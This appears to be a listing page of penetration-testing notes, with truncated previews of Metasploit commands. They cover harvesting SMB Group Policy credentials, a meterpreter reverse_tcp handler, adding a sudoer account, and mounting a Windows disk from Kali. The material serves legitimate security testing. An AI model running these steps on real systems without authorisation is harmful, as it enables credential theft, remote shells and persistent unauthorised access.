Internal Infrastructure Pentest - Socks Tunnel
SOCKS 5 proxy tunnel:
SOCKS 5 proxy tunnel:
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...